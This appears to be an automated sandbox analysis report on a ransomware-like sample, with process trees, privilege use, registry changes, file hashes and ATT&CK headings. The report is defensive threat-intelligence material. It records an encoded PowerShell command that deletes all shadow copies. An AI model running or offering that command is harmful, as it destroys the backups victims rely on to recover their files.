    Set value (data)\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 030000000100000014000000d89e3bd43d5d909b47a18977aa9d5ce36cee184c1400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb040000000100000010000000285ec909c4ab0d2d57f5086b225799aa0f000000010000003000000013baa039635f1c5292a8c2f36aae7e1d25c025202e9092f5b0f53f5f752dfa9c71b3d1b8d9a6358fcee6ec75622fabf9190000000100000010000000ea6089055218053dd01e37e1d806eedf1800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa22000000001000000850500003082058130820469a00302010202103972443af922b751d7d36c10dd313595300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3139303331323030303030305a170d3238313233313233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c05000382010100188751dc74213d9c8ae027b733d02eccecf0e6cb5e11de226f9b758e9e72fee4d6feaa1f9c962def034a7eaef48d6f723c433bc03febb8df5caaa9c6aef2fcd8eea37b43f686367c14e0cdf4f73ffedeb8b48af09196fefd43647efdccd201a17d7df81919c9422b13bf588bbaa4a266047688914e0c8914cea24dc932b3bae8141abc71f15bf0410b98000a220310e50cb1f9cd923719ed3bf1e43ab6f945132675afbbaaef3f7b773bd2c402913d1900d3175c39db3f7b180d45cd9385962f5ddf59164f3f51bdd545183fed4a8ee80661742316b50d50732744477f105d892a6b853114c4e8a96a4c80bc6a78cfb87f8e7672990c9dfed7910816a1a35f95cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
  • Suspicious behavior: EnumeratesProcesses
    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exepowershell.exe

    Reported IOCs

    pidprocess
    1540cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    452powershell.exe
  • Suspicious use of AdjustPrivilegeToken
    powershell.exevssvc.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege452powershell.exe
    Token: SeBackupPrivilege1100vssvc.exe
    Token: SeRestorePrivilege1100vssvc.exe
    Token: SeAuditPrivilege1100vssvc.exe
  • Suspicious use of WriteProcessMemory
    cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.execedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 780 wrote to memory of 1540780cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.execedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    PID 780 wrote to memory of 1540780cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.execedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    PID 780 wrote to memory of 1540780cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.execedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    PID 780 wrote to memory of 1540780cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.execedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    PID 1540 wrote to memory of 4521540cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exepowershell.exe
    PID 1540 wrote to memory of 4521540cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exepowershell.exe
    PID 1540 wrote to memory of 4521540cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exepowershell.exe
    PID 1540 wrote to memory of 4521540cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exepowershell.exe
Processes 5
  • C:\Users\Admin\AppData\Local\Temp\cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
    "C:\Users\Admin\AppData\Local\Temp\cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe"
    Modifies system executable filetype association
    Loads dropped DLL
    Drops file in Program Files directory
    Drops file in Windows directory
    Modifies registry class
    Suspicious use of WriteProcessMemory
    PID:780
    • C:\Users\Admin\AppData\Local\Temp\3582-490\cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe"
      Executes dropped EXE
      Modifies extensions of user files
      Enumerates connected drives
      Drops file in System32 directory
      Sets desktop wallpaper using registry
      Drops file in Program Files directory
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1540
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        PID:452
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    PID:1232
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    Suspicious use of AdjustPrivilegeToken
    PID:1100
Network
MITRE ATT&CK Matrix
Command and Control
    Credential Access
    Execution
      Exfiltration
        Impact
        Initial Access
          Lateral Movement
            Privilege Escalation
              Replay Monitor
              00:00 00:00
              Downloads
              • C:\Users\Admin\AppData\Local\Temp\3582-490\cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

                MD5

                777589bebd9755259639db210e619e50

                SHA1

                b48e42718b55e072ab5e0c81855cacf13a593bb7

                SHA256

                585a0bdb8575d5f7426840d71b9c6081e37fcbdbc04135cc15749e30268572ab

                SHA512

                2f9b0942e41552c6964d1b69cb2bd2b3aa1a9a0ee55aaa2d11a6044f96a01f6d3cb6a559763a865ca4be1bc78011595d5081f637f005f6b8954f16effab0b82f

              • \PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE

                MD5

                9e2b9928c89a9d0da1d3e8f4bd96afa7

                SHA1

                ec66cda99f44b62470c6930e5afda061579cde35

                SHA256

                8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043

                SHA512

                2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156

              • \Users\Admin\AppData\Local\Temp\3582-490\cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

                MD5

                777589bebd9755259639db210e619e50

                SHA1

                b48e42718b55e072ab5e0c81855cacf13a593bb7

                SHA256

                585a0bdb8575d5f7426840d71b9c6081e37fcbdbc04135cc15749e30268572ab

                SHA512

                2f9b0942e41552c6964d1b69cb2bd2b3aa1a9a0ee55aaa2d11a6044f96a01f6d3cb6a559763a865ca4be1bc78011595d5081f637f005f6b8954f16effab0b82f

              • \Users\Admin\AppData\Local\Temp\3582-490\cedcfc2954f0bef091a0db5900d0b2a13adb883d41b37d7e0db4af7234dcd862.exe

                MD5

                777589bebd9755259639db210e619e50

                SHA1

                b48e42718b55e072ab5e0c81855cacf13a593bb7

                SHA256

                585a0bdb8575d5f7426840d71b9c6081e37fcbdbc04135cc15749e30268572ab

                SHA512

                2f9b0942e41552c6964d1b69cb2bd2b3aa1a9a0ee55aaa2d11a6044f96a01f6d3cb6a559763a865ca4be1bc78011595d5081f637f005f6b8954f16effab0b82f

              • memory/452-62-0x0000000002850000-0x0000000002852000-memory.dmp

              • memory/452-61-0x000007FEF34B0000-0x000007FEF400D000-memory.dmp

              • memory/452-63-0x0000000002852000-0x0000000002854000-memory.dmp

              • memory/452-64-0x0000000002854000-0x0000000002857000-memory.dmp

              • memory/452-65-0x000000000285B000-0x000000000287A000-memory.dmp

              • memory/452-60-0x000007FEFC261000-0x000007FEFC263000-memory.dmp

              • memory/780-55-0x00000000769D1000-0x00000000769D3000-memory.dmp